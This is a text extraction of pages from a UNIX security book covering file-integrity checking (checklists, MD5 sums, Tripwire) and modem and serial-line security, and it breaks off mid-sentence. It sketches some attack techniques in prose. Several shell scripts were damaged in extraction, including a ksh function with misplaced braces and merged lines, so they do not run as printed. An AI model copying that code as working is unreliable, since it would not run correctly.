[Chapter 9] 9.2 Detecting Change<br />

9.2.1.2 Remote copies<br />

A third method of using comparison copies is to store them on a remote site and make them available remotely in some<br />

manner. For instance, you might place copies of all the system files on a disk partition on a secured server, and export that<br />

partition read-only using NFS or some similar protocol. All the client hosts could then mount that partition and use the<br />

copies in local comparisons. Of course, you need to ensure that whatever programs are used in the comparison (e.g., cmp,<br />

find, and diff) are taken from the remote partition and not from the local disk. Otherwise, an attacker could modify those<br />

files to not report changes!<br />

9.2.1.3 rdist<br />

Another method of remote comparison would be to use a program to do the comparison across the network. The rdist<br />

utility is one such program that works well in this context. The drawback to using rdist, however, is the same as with using<br />

full comparison copies: you need to read both versions of each file, byte by byte. The problem is compounded, however,<br />

because you need to transfer one copy of each file across the network each time you perform a check. Another drawback is<br />

that rdist depends on the Berkeley trusted hosts mechanism to work correctly (unless you have Kerberos installed), and<br />

this may open the systems more than you want to allow.<br />

NOTE: If you have an older version of rdist, be certain to check with your vendor for an update. Some<br />

versions of rdist can be exploited to gain root access to a system. See CERT advisories 91-20 and 94-04 for<br />

more information.<br />

One scenario we have found to work well with rdist is to have a "master" configuration for each architecture you support<br />

at your site. This "master" machine should not generally support user accounts, and it should have extra security measures<br />

in place. On this machine, you put your master software copies, possibly installed on read-only disks.<br />

Periodically, the master machine copies a clean copy of the rdist binary to the client machine to be checked. The master<br />

machine then initiates an rdist session involving the -b option (byte-by-byte compare) against the client. Differences are<br />

reported, or optionally, fixed. In this manner you can scan and correct dozens or hundreds of machines automatically. If<br />

you use the -R option, you can also check for new files or directories that are not supposed to be present on the client<br />

machine.<br />

An rdist "master" machine has other advantages. It makes it much easier to install new and updated software on a large set<br />

of client machines. This feature is especially helpful when you are in a rush to install the latest security patch in software<br />

on every one of your machines. It also provides a way to ensure that the owners and modes of system files are set correctly<br />

on all the clients. The down side of this is that if you are not careful, and an attacker modifies your master machine, rdist<br />

will as efficiently install the same security hole on every one of your clients, automatically!<br />

Note that the normal mode of operation of rdist, without the -b option, does not do a byte-by-byte compare. Instead, it only<br />

compares the metadata in the Inode concerning times and file sizes. As we discuss in the next section, this information can<br />

be spoofed.<br />

9.2.2 Checklists and Metadata<br />

Saving an extra copy of each critical file and performing a byte-by-byte comparison can be unduly expensive. It requires<br />

substantial disk space to store the copies. Furthermore, if the comparison is performed over the network, either via rdist or<br />

NFS, it will involve substantial disk and network overhead each time the comparisons are made.<br />

A more efficient approach would be to store a summary of important characteristics of each file and directory. When the<br />

time comes to do a comparison, the characteristics are regenerated and compared with the saved information. If the<br />

characteristics are comprehensive and smaller than the file contents (on average), then this method is clearly a more<br />

efficient way of doing the comparison.<br />

Furthermore, this approach can capture changes that a simple comparison copy cannot: comparison copies detect changes<br />

in the contents of files, but do little to detect changes in metadata such as file owners or protection modes. It is this data -<br />

the data normally kept in the Inodes of files and directories - that is sometimes more important than the data within the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (2 of 7) [2002-04-12 10:44:47]


[Chapter 9] 9.2 Detecting Change<br />

files themselves. For instance, changes in owner or protection bits may result in disaster if they occur to the wrong file or<br />

directory.<br />

Thus, we would like to compare the values in the inodes of critical files and directories with a database of comparison<br />

values. The values we wish to compare and monitor for critical changes are owner, group, and protection modes. We also<br />

wish to monitor the mtime (modification time) and the file size to determine if the file contents change in an unauthorized<br />

or unexpected manner. We may also wish to monitor the link count, Inode number, and ctime as additional indicators of<br />

change. All of this material can be listed with the ls command.<br />

9.2.2.1 Simple listing<br />

The simplest form of a checklist mechanism is to run the ls command on a list of files and compare the output against a<br />

saved version. The most primitive approach might be a shell script such as this:<br />

#!/bin/sh<br />

cat /usr/adm/filelist | xargs ls -ild > /tmp/now<br />

diff -b /usr/adm/savelist /tmp/now<br />

The file /usr/adm/filelist would contain a list of files to be monitored. The /usr/adm/savelist file would contain a base<br />

listing of the same files, generated on a known secure version of the system. The -i option adds the inode number in the<br />

listing. The -d option includes directory properties, rather than contents, if the entry is a directory name.<br />

This approach has some drawbacks. First of all, the output does not contain all of the information we might want to<br />

monitor. A more complete listing can be obtained by using the find command:<br />

#!/bin/sh<br />

find `cat /usr/adm/filelist` -ls > /tmp/now<br />

diff -b /usr/adm/savelist /tmp/now<br />

This will not only give us the data to compare on the entries, but it will also disclose if files have been deleted or added to<br />

any of the monitored directories.<br />

NOTE: Writing a script to do the above and running it periodically from a cron file can seem tempting. The<br />

difficulty with this approach is that an attacker may modify the cron entry or the script itself to not report any<br />

changes. Thus, be cautious if you take this approach and be sure to review and then execute the script<br />

manually on a regular basis.<br />

9.2.2.2 Ancestor directories<br />

We should mention here that you must check the ancestor directories of all critical files and directories - all the directories<br />

between the root directory and the files being monitored. These are often overlooked, but can present a significant problem<br />

if their owner or permissions are altered. An attacker could then be able to rename one of the directories and install a<br />

replacement or a symbolic link to a replacement that contains dangerous information. For instance, if the /etc directory<br />

becomes mode 777, then anyone could temporarily rename the password file, install a replacement containing a root entry<br />

with no password, run su, and reinstall the old password file. Any commands or scripts you have that monitor the password<br />

file would show no change unless they happen to run during the few seconds of the actual attack - something the attacker<br />

can usually avoid.<br />

The following script takes a list of absolute file pathnames, determines the names of all containing directories, and then<br />

prints them. These files can then be added to your comparison list (checklist) such as the script shown earlier:<br />

#!/bin/ksh<br />

typeset pdir<br />

function getdir # Gets the real, physical pathname<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (3 of 7) [2002-04-12 10:44:47]


[Chapter 9] 9.2 Detecting Change<br />

{<br />

}<br />

if [[ $1 != /* ]]<br />

then<br />

print -u2 "$1 is not an absolute pathname"<br />

return 1<br />

elif cd "${1%/*}"<br />

then<br />

pdir=$(pwd -P)<br />

cd ~else<br />

print -u2 "Unable to attach to directory of $1"<br />

return 2<br />

fi<br />

return 0<br />

cd /<br />

print / # ensure we always have the root directory included<br />

while read name<br />

do<br />

getdir $name || continue<br />

while [[ -n $pdir ]]<br />

do<br />

print $pdir<br />

pdir=${pdir%/*}<br />

done<br />

done | sort -u<br />

9.2.3 Checksums and Signatures<br />

Unfortunately, the approach we described above for monitoring files can be defeated with a little effort. Files can be<br />

modified in such a way that the information we monitor will not disclose the change. For instance, a file might be modified<br />

by writing to the raw disk device after the appropriate block is known. As the modification did not go through the<br />

filesystem, none of the information in the inodes will be altered.<br />

You could also surreptitiously alter a file by setting the system clock back to the time of the last legitimate change, making<br />

the edits, and then setting the clock forward again. If this is done quickly enough, no one will notice the change.<br />

Furthermore all the times on the file (including the ctime) will be set to the "correct" values. Several hacker toolkits in<br />

widespread use on the <strong>Internet</strong> actually take this approach. It is easier and safer than writing to the raw device. It is also<br />

more portable.<br />

Thus, we need to have some stronger approach in place to check the contents of files against a known good value.<br />

Obviously, we could use comparison copies, but we have already noted that they are expensive. A second approach would<br />

be to create a signature of the file's contents to determine if a change occurred.<br />

The first, naive approach with such a signature might involve the use of a standard CRC checksum, as implemented by the<br />

sum command. CRC polynomials are often used to detect changes in message transmissions, so they could logically be<br />

applied here. However, this application would be a mistake.<br />

CRC checksums are designed to detect random bit changes, not purposeful alterations. As such, CRC checksums are good<br />

at finding a few bits changed at random. However, because they are generated with well-known polynomials, one can alter<br />

the input file so as to generate an arbitrary CRC polynomial after an edit. In fact, some of the same hacker toolkits that<br />

allow files to be changed without altering the time also contain code to set the file contents to generate the same sum<br />

outputs for the altered file as for the original.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (4 of 7) [2002-04-12 10:44:47]


[Chapter 9] 9.2 Detecting Change<br />

To generate a checksum that cannot be easily spoofed, we need to use a stronger mechanism, such as the message digests<br />

described in "Message Digests and Digital Signatures" in Chapter 6, Cryptography. These are also dependent on the<br />

contents of the file, but they are too difficult to spoof after changes have been made.<br />

If we had a program to generate the MD5 checksum of a file, we might alter our checklist script to be:<br />

#!/bin/sh<br />

find `cat /usr/adm/filelist` -ls -type f -exec md5 {}\; > /tmp/now<br />

diff -b /usr/adm/savelist /tmp/now<br />

9.2.4 Tripwire<br />

Above, we described a method of generating a list of file attributes and message digests. The problem with this approach is<br />

that we don't really want that information for every file. For instance, we want to know if the owner or protection modes of<br />

/etc/passwd change, but we don't care about the size or checksum because we expect the contents to change. At the same<br />

time, we are very concerned if the contents of /bin/login are altered.<br />

We would also like to be able to use different message digest algorithms. In some cases, we are concerned enough that we<br />

want to use three strong algorithms, even if they take a long time to make the comparison; after all, one of the algorithms<br />

might be broken soon.[4] In other environments, a fast but less secure algorithm, used in conjunction with other methods,<br />

might be all that is necessary.<br />

[4] This is not so farfetched. As this book went to press, reports circulated of a weakness in the MD4 message<br />

digest algorithm.<br />

In an attempt to meet these needs[5] the Tripwire package was written at Purdue by Gene Kim and Gene Spafford.<br />

Tripwire is a program that runs on every major version of <strong>UNIX</strong> (and several obscure versions). It reads a configuration<br />

file of files and directories to monitor, and then tracks changes to inode information and contents. The database is highly<br />

configurable, and allows the administrator to specify particular attributes to monitor, and particular message digest<br />

algorithms to use for each file.<br />

[5] And more: see the papers that come with the distribution.<br />

9.2.4.1 Building Tripwire<br />

To build the Tripwire package, you must first download a copy from the canonical distribution site, located at<br />

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire.[6] The distribution has been signed with a detached PGP digital signature<br />

to verify that the version you download has not been altered in an unauthorized manner (See the discussion of digital<br />

signatures in "PGP detached signatures" in Chapter 6.)<br />

[6] As this book goes to press, several companies are discussing a commercial version of Tripwire. If one is<br />

available, a note will be on the FTP site noting its source. Be aware that Purdue University holds the<br />

copyright on Tripwire and only allows its use for limited, noncommercial use without additional license.<br />

Next, read all the README files in the distribution. Be certain you understand the topics discussed. Pay special attention<br />

to the details of customization for local considerations, including the adaption for the local operating system. These<br />

changes normally need to be made in the include/config.h file. You also need to set the CONFIG_PATH and<br />

DATABASE_PATH defines to the secured directory where you will store the data.<br />

One additional change that might be made is to the default flags field, defined in the DEFAULTIGNORE field. This item<br />

specifies the fields that Tripwire, by default, will monitor or ignore for files without an explicit set of flags. As shipped,<br />

this is set to the value "R-3456789" - the flags for read-only files, and only message digests 1 and 2. These are the MD5<br />

and Snefru signatures. You may want to change this to include other signatures, or replace one of these signatures with a<br />

different one; the MD5, SHA, and Haval algorithms appear to be the strongest algorithms to use.<br />

Next, you will want to do a make followed by a make test. The test exercises all of the Tripwire functions, and ensures that<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (5 of 7) [2002-04-12 10:44:47]


[Chapter 9] 9.2 Detecting Change<br />

it was built properly for your machine. This will also demonstrate how the output from Tripwire appears.<br />

The next step is to build the configuration file. Tripwire scans files according to a configuration file. The file contains the<br />

names of files and directories to scan, and flags to specify what to note for changes. For example, you might have the<br />

following in your configuration file:<br />

/.rhosts R # may not exist<br />

/.profile R # may not exist<br />

/.forward R-12+78 # may not exist<br />

/usr/spool/at L<br />

=/tmp L-n<br />

In this example, the /.rhosts, /.profile, and /.forward file have everything in the inode checked for changes except the<br />

access time. Thus, the owner, group, size, protection modes, modification time, link count, and ctime are all monitored for<br />

change. Further, the first two files are also checksummed using the MD5 and Snefru signatures, and the /.forward file is<br />

checksummed with the SHA and HAVAL algorithms. The directory /usr/spool/at and everything inside it is checked for<br />

changes to owner, group, protection modes, and link count; changes to contents are allowed and ignored. The /tmp<br />

directory is checked for the same changes, but its contents are not checked.<br />

Other flags and combinations are also possible. Likely skeleton configuration files are provided for several major<br />

platforms.<br />

Finally, you will want to move the binary for Tripwire and the configuration file to the protected directory that is located<br />

on (normally) read-only storage. You will then need to initialize the database; be sure that you are doing this on a known<br />

clean system - reinstall the software, if necessary. After you have generated the database, set the protections on the<br />

database and binary.<br />

When you build the database, you will see output similar to this:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

###<br />

### Warning: Database file placed in ./databases/tw.db_mordor.cs.purdue.edu.<br />

###<br />

### Make sure to move this file file and the configuration<br />

### to secure media!<br />

###<br />

### (Tripwire expects to find it in `/floppy/system.db'.)<br />

NOTE: When possible, build Tripwire statically to prevent its using shared libraries which might have Trojan<br />

horses in them. This type of attack is one of the few remaining vulnerabilities in the use of Tripwire.<br />

9.2.4.2 Running Tripwire<br />

You run Tripwire from the protected version on a periodic basis to check for changes. You should run it manually<br />

sometimes rather than only from cron. This step ensures that Tripwire is actually run and you will see the output. When<br />

you run it and everything checks out as it should, you will see output something like this:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

### Phase 4: Searching for inconsistencies<br />

###<br />

### Total files scanned: 2640<br />

### Files added: 0<br />

### Files deleted: 0<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (6 of 7) [2002-04-12 10:44:47]


[Chapter 9] 9.2 Detecting Change<br />

### Files changed: 2586<br />

###<br />

### After applying rules:<br />

### Changes discarded: 2586<br />

### Changes remaining: 0<br />

###<br />

This output indicates no changes. If files or directories had changed, you would instead see output similar to:<br />

### Phase 1: Reading configuration file<br />

### Phase 2: Generating file list<br />

### Phase 3: Creating file information database<br />

### Phase 4: Searching for inconsistencies<br />

###<br />

### Total files scanned: 2641<br />

### Files added: 1<br />

### Files deleted: 0<br />

### Files changed: 2588<br />

###<br />

### After applying rules:<br />

### Changes discarded: 2587<br />

### Changes remaining: 3<br />

###<br />

added: -rw------- root 27 Nov 8 00:33:40 1995 /.login<br />

changed: -rw-r--r-- root 1594 Nov 8 00:36:00 1995 /etc/mnttab<br />

changed: drwxrwxrwt root 1024 Nov 8 00:42:37 1995 /tmp<br />

### Phase 5: Generating observed/expected pairs for changed files<br />

###<br />

### Attr Observed (what it is) Expected (what it should be)<br />

### =========== ================================================<br />

/etc/mnttab<br />

st_mtime: Wed Nov 8 00:36:00 1995 Tue Nov 7 18:44:47 1995<br />

st_ctime: Wed Nov 8 00:36:00 1995 Tue Nov 7 18:44:47 1995<br />

md5 (sig1): 2tIRAXU5G9WVjUKuRGTkdi 0TbwgJStEO1boHRbXkBwcD<br />

snefru (sig2): 1AvEJqYMlsOMUAE4J6byKJ 3A2PMKEy3.z8KIbwgwBkRs<br />

/tmp<br />

st_nlink: 5 4<br />

This output shows that a file has been added to a monitored directory (Tripwire also detects when files are deleted), and<br />

that both a directory and a file had changes. In each case, the nature of the changes are reported to the user. This report can<br />

then be used to determine what to do next.<br />

Tripwire has many options, and can be used for several things other than simple change detection. The papers and man<br />

pages provided in the distribution are quite detailed and should be consulted for further information .<br />

9.1 Prevention 9.3 A Final Note<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch09_02.htm (7 of 7) [2002-04-12 10:44:47]


[Chapter 14] 14.6 Additional <strong>Sec</strong>urity for Modems<br />

Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

14.6 Additional <strong>Sec</strong>urity for Modems<br />

With today's telephone systems, if you connect your computer's modem to an outside telephone line, then<br />

anybody in the world can call it. In the future, the telephone system might be able to easily prevent<br />

people from calling your computer's modem unless you have specifically preauthorized them. Until then,<br />

we will have to rely on other mechanisms to protect our modems and computers from intruders.<br />

Although usernames and passwords provide a degree of security, they are not foolproof. Users often pick<br />

bad passwords, and even good passwords can occasionally be guessed or discovered by other means.<br />

For this reason, a variety of special kinds of modems have been developed that further protect computers<br />

from unauthorized access. These modems are more expensive than traditional modems, but they do<br />

provide an added degree of security and trust.<br />

●<br />

●<br />

●<br />

Password modems. These modems require the caller to enter a password before the modem<br />

connects the caller to the computer. As with regular <strong>UNIX</strong> passwords, the security provided by<br />

these modems can be defeated by repeated password guessing or by having an authorized person<br />

release his password to somebody who is not authorized. Usually, these modems can only store<br />

one to ten passwords. The password stored in the modem should not be the same as the password<br />

of any user. Some versions of <strong>UNIX</strong> can be set up to require special passwords for access by<br />

modem. Password modems are probably unnecessary on systems of this kind; the addition of yet<br />

another password may be more than your users are prepared to tolerate.<br />

Callback setups. As we mentioned earlier in this chapter, these schemes require the caller to enter<br />

a username, and then immediately hang up the telephone line. The modem then will call the caller<br />

back on a predetermined telephone number. These schemes offer a higher degree of security than<br />

regular modems, although they can be defeated by somebody who calls the callback modem at the<br />

precise moment that it is trying to make its outgoing telephone call. Most callback modems can<br />

only store a few numbers to call back. These modems can also be defeated on some kinds of PBX<br />

systems by not hanging up the telephone line when the computer attempts to dial back.<br />

Encrypting modems. These modems, which must be used in pairs, encrypt all information<br />

transmitted and received over the telephone lines. These modems offer an extremely high degree<br />

of security not only against individuals attempting to gain unauthorized access, but also against<br />

wiretapping. Some encrypting modems contain preassigned cryptographic "keys" that work only in<br />

pairs. Other modems contain keys that can be changed on a routine basis, to further enhance<br />

security. (Chapter 6, Cryptography, contains a complete discussion of encryption.)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_06.htm (1 of 2) [2002-04-12 10:44:47]


[Chapter 14] 14.6 Additional <strong>Sec</strong>urity for Modems<br />

●<br />

Caller-ID and ANI schemes. These use a relatively new feature available on many digital<br />

telephone switches. As described in the section "" earlier in this chapter, you can use the<br />

information provided by the telephone company for logging or controlling access. Already, some<br />

commercial firms provide a form of call screening using ANI (Automatic Number Identification)<br />

for their 800 numbers (which have had ANI available since the late 1980s). When the user calls the<br />

800 number, the ANI information is checked against a list of authorized phone numbers, and the<br />

call is switched to the company's computer only if the number is approved.<br />

14.5 Modems and <strong>UNIX</strong> 15. UUCP<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_06.htm (2 of 2) [2002-04-12 10:44:47]


[Chapter 14] 14.3 The RS-232 Serial Protocol<br />

Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

14.3 The RS-232 Serial Protocol<br />

One of the most common serial interfaces is based on the RS-232 standard, which was developed<br />

primarily to allow individuals to use terminals with remote computer systems over a telephone line more<br />

easily.<br />

The basic configuration of a terminal and a computer connected by two modems is shown in Figure 7.2.<br />

Figure 14.2: A terminal and a computer connected by two modems<br />

The computer and terminal are called data terminal equipment (DTE), while the modems are called data<br />

communication equipment (DCE). The standard RS-232 connector is a 25-pin D-shell type connector;<br />

only nine pins are used to connect the DTE and DCE sides together, as seen in Figure 14.3.<br />

Figure 14.3: The standard 25-pin RS-232 connector<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_03.htm (1 of 4) [2002-04-12 10:44:48]


[Chapter 14] 14.3 The RS-232 Serial Protocol<br />

Of these nine pins, only transmit data (pin 2), receive data (pin 3), and signal ground (pin 7) are essential<br />

for directly wired communications. Five pins (2, 3, 7, 8, and 20) are needed for proper operation of<br />

modems. Frame ground (pin 1) was originally used to connect electrically the physical frame of the DCE<br />

and the frame of the DTE to reduce electrical hazards, although its use has been discontinued in the<br />

RS-232-C standard. Table 14.1 describes the use of each pin.<br />

Table 14.1: .RS-232 Pin Assignments for a 25-Pin Connector<br />

Pin Code Name Description<br />

1 FG Frame Ground Chassis ground of equipment. (Note: this pin is historical; modern<br />

systems don't connect the electrical ground of different components<br />

together, because such a connection causes more problems than it<br />

solves.)<br />

2 TD Transmit Data Data transmitted from the computer or terminal to the modem.<br />

3 RD Receive Data Data transmitted from the modem to the computer.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_03.htm (2 of 4) [2002-04-12 10:44:48]


[Chapter 14] 14.3 The RS-232 Serial Protocol<br />

4 RTS Request to Send Tells the modem when it can transmit data. Sometimes the computer is<br />

busy and needs to have the modem wait before the next character is<br />

transmitted. Used for "hardware flow control."<br />

5 CTS Clear to Send Tells the computer when it's okay to transmit data. Sometimes the<br />

modem is busy and needs to have the computer wait before the next<br />

character is transmitted. Used for "hardware flow control."<br />

6 DSR Data Set Ready Tells the computer that the modem is turned on. The computer should<br />

not send the modem commands if this signal is not present.<br />

7 SG Signal Ground Reference point for all signal voltages.<br />

8 DCD Data Carrier Detect Tells the computer that the modem is connected by telephone with<br />

another modem. <strong>UNIX</strong> may use this signal to tell it when to display a<br />

login:banner.<br />

22 RI Ring Indicator Tells the computer that the telephone is ringing.<br />

20 DTR Data Terminal Ready Tells the modem that the computer is turned on and ready to accept<br />

connections. The modem should not answer the telephone - and it<br />

should automatically hang up on an established conversation - if this<br />

signal is not present.<br />

Because only eight pins of the 25-pin RS-232 connector are used, the computer industry has largely<br />

moved to smaller connectors that have fewer pins and cost less money to produce. Most PCs are<br />

equipped with a 9-pin RS-232 connector, which has pin assignments: listed in Table 14.2.<br />

Table 14.2: .RS-232 Pin Assignments for 25- and 9-pin Connectors<br />

Code Name 25-pin Connector Assignment 9-pin Connector Assignment<br />

TD Transmit Data 2 3<br />

RD Receive Data 3 2<br />

RTS Request to Send 4 7<br />

CTS Clear to Send 5 8<br />

DSR Data Set Ready 6 6<br />

SG Signal Ground 7 5<br />

DCD Data Carrier Detect 8 1<br />

DTR Data Terminal Ready 20 4<br />

RI Ring indicator 22 9<br />

A number of nonstandard RS-232 connectors are also in use. The Apple Macintosh computer uses a<br />

circular 9-pin DIN connector, and there are several popular (and incompatible) systems for using<br />

standard modular telephone cords.<br />

In general, you should be suspicious of any RS-232 system that claims to carry all eight signals between<br />

the data set and the data terminal without the full complement of wires.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_03.htm (3 of 4) [2002-04-12 10:44:48]


[Chapter 14] 14.3 The RS-232 Serial Protocol<br />

14.3.1 Originate and Answer<br />

Modern modems can both place and receive telephone calls. After a connection between two modems is<br />

established, information that each modem receives on the TD pin is translated into a series of tones that<br />

are sent down the telephone line. Likewise, each modem takes the tones that it receives through its<br />

telephone connection, passes them through a series of filters and detectors, and eventually translates them<br />

back into data that is transmitted on the RD pin.<br />

To allow modems to transmit and receive information at the same time, different tones are used for each<br />

direction of data transfer. By convention, the modem that places the telephone call runs in originate<br />

mode and uses one set of tones, while the modem that receives the telephone call operates in answer<br />

mode and uses another set of tones.<br />

High-speed modems have additional electronics inside them that perform data compression before the<br />

data is translated into tones. Some high-speed modems automatically reallocate their audio spectrum as<br />

the call progresses to maximize signal clarity and thus maximize data transfer speed. Others allocate a<br />

high-speed channel to the answering modem and a low-speed channel to the originating modem, with<br />

provisions for swapping channels should the need arise.<br />

Further details on modem operation are available from any reasonably current book on data<br />

communications. Some are listed in Appendix D, Paper Sources.<br />

14.2 Serial Interfaces 14.4 Modems and <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_03.htm (4 of 4) [2002-04-12 10:44:48]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

14.5 Modems and <strong>UNIX</strong><br />

<strong>UNIX</strong> can use modems both for placing calls (dialing out) and for receiving them (letting other people<br />

dial in).<br />

If you are calling out, you can call computers running any operating system. Outgoing calls are usually<br />

made with the tip or cu commands. If you call a computer that's running the <strong>UNIX</strong> operating system, you<br />

may be able to use a simple file-transfer system built into tip and cu. Unfortunately, such a system<br />

performs no error checking or correction and works only for transferring text files.<br />

Another popular program for dialing out is kermit, from Columbia University. Besides performing<br />

terminal emulation, kermit also allows reliable file transfer between different kinds of computers.<br />

Versions of kermit are available for practically every kind of computer in existence.<br />

You can also set up your computer's modem to let people with their own modems call into your<br />

computer. There are many reasons why you might wish to do this:<br />

●<br />

●<br />

●<br />

●<br />

If you have many people within your organization who want to use your computer, but they need<br />

to use it only infrequently, the most cost-effective approach might be to have each employee call<br />

your computer, rather than wiring terminal lines to every person's office.<br />

If some people in your organization travel a lot, they might want to use a modem to access the<br />

computer when they're out of town.<br />

If people in your organization want to use the computer from their homes after hours or on<br />

weekends, a modem will allow them to do so.<br />

You can have administrators do some remote maintenance and administration when they are "on<br />

call."<br />

<strong>UNIX</strong> also uses modems with the UUCP (<strong>UNIX</strong>-to-<strong>UNIX</strong> Copy) network system, which allows different<br />

computers to exchange electronic mail; we discuss UUCP in detail in Chapter 15, UUCP. You can also<br />

use modems with SLIP (Serial Line <strong>Internet</strong> Protocol) or PPP (Point-to-Point Protocol) to integrate<br />

remote computers transparently with local area networks. To set up a UUCP, SLIP, or PPP link between<br />

two computers, one computer must be able to place telephone calls and the other must be able to receive<br />

them.<br />

Despite these benefits, modems come with many risks. Because people routinely use modems to transmit<br />

their usernames and passwords, you should ensure that your modems are properly installed, behaving<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (1 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

properly, and doing exactly what you think they are doing - and nothing else.<br />

14.5.1 Hooking Up a Modem to Your Computer<br />

Because every computer and every modem is a little different, follow your manufacturer's directions<br />

when connecting a modem to your computer. Usually, there is a simple, ready-made cable that can be<br />

used to connect the two. If you are lucky, that cable may even come in the same box as your modem.<br />

After the modem is physically connected, you will need to set up a number of configuration files on your<br />

computer so that your system knows where the modem is connected and what kind of commands it<br />

responds to.<br />

On Berkeley-derived systems, you may have to modify the files /etc/ttys, /etc/remote, and<br />

/usr/lib/uucp/L-devices if you wish to use UUCP. On System V systems, you may have to modify the<br />

files /etc/inittab and /usr/lib/uucp/Devices. You may also have to create a special device file in the /dev<br />

directory, or change the permissions on an existing file. The formats of these files are discussed in<br />

Chapter 15, UUCP.<br />

Depending on the software you are using, you should also check the permissions on any configuration<br />

files used with your modem software. These may include files of commands, phone numbers, PPP or<br />

SLIP initialization values, and so on. As the number and location of these files vary considerably from<br />

system to system, we can only suggest that you read the documentation carefully for the names of any<br />

auxiliary files that may be involved. Pay special attention to any man pages associated with the software<br />

as they often include a section entitled "Files" that names associated files.<br />

14.5.2 Setting Up the <strong>UNIX</strong> Device<br />

Each version of <strong>UNIX</strong> has one or more special devices in the /dev directory that are dedicated to modem<br />

control. Some of the names that we have seen are:<br />

/dev/cua*<br />

/dev/ttyda<br />

/dev/ttys[0-9]<br />

/dev/tty1A<br />

/dev/modem<br />

/dev/ttydfa<br />

Some versions of <strong>UNIX</strong> use the same devices for inbound and outbound calls; others use different names<br />

for each purpose, even though the names represent the same physical device. Check your documentation<br />

to see what the filenames are for your system.<br />

Permissions for the <strong>UNIX</strong> devices associated with modems should be set to mode 600 and owned by<br />

either root or uucp. If the modem device is made readable by group or world, it might be possible for<br />

users to intercept incoming phone calls and eavesdrop on ongoing conversations, or create Trojan Horse<br />

programs that invite unsuspecting callers to type their usernames and passwords.<br />

Permissions for the <strong>UNIX</strong> devices associated with the outgoing modems should also be set so that the<br />

modems cannot be accessed by ordinary users. Usually, these permissions are achieved by setting the<br />

devices to mode 600, and are owned by either root or uucp. To make an outgoing call, users must then<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (2 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

use a specially designated communications program such as tip or cu. These systems must be installed<br />

SUID so that they can access the external device.<br />

You can check the ownership and modes of these devices with the ls command:<br />

% ls -lgd /dev/cu*<br />

crw----- 1 uucp wheel 11,192 Oct 20 10:38 /dev/cua<br />

crw----- 1 uucp wheel 11,193 Dec 21 1989 /dev/cub<br />

%<br />

14.5.3 Checking Your Modem<br />

After your modem is connected, you should thoroughly test its ability to make and receive telephone<br />

calls. First, make sure that the modem behaves properly under normal operating circumstances. Next,<br />

make sure that when something unexpected happens, the computer behaves in a reasonable and<br />

responsible way. For example, if a telephone connection is lost, your computer should kill the associated<br />

processes and log the user out, rather than letting the next person who dials in type commands at the<br />

previous shell. Most of this testing will ensure that your modem's control signals are being properly sent<br />

to the computer (so that your computer knows when a call is in progress), as well as ensuring that your<br />

computer behaves properly with this information.<br />

14.5.3.1 Originate testing<br />

If you have configured your modem to place telephone calls, you need to verify that it always does the<br />

right thing when calls are placed as well as when they are disconnected.<br />

To test your modem, you must call another computer that you know behaves properly. (Do not place a<br />

call to the same computer that you are trying to call out from; if there are problems, you may not be able<br />

to tell where the problem lies.)<br />

Test as follows:<br />

1.<br />

2.<br />

3.<br />

4.<br />

Try calling the remote computer with the tip or cu command. When the computer answers, you<br />

should be able to log in and use the remote computer as if you were connected directly.<br />

Hang up on the remote computer by pulling the telephone line out of the originating modem. Your<br />

tip or cu program should realize that the connection has been lost and return you to the <strong>UNIX</strong><br />

prompt.<br />

Call the remote computer again and this time hang up by turning off your modem. Again, your tip<br />

or cu program should realize that something is wrong and return you to the <strong>UNIX</strong> prompt.<br />

Call the remote computer again. This time, leave the telephone connection intact and exit your tip<br />

or cu program by typing the following sequence:<br />

carriage return, tilde (~), period (.), carriage return<br />

Your modem should automatically hang up on the remote computer.<br />

1.<br />

Call the remote computer one last time. This time, do a software disconnect by killing the tip or cu<br />

process on your local computer from another terminal. (You may need to be the superuser to use<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_05.htm (3 of 7) [2002-04-12 10:44:49]


[Chapter 14] 14.5 Modems and <strong>UNIX</strong><br />

the kill command to kill the other process. See Appendix C, <strong>UNIX</strong> Processes, for details about<br />

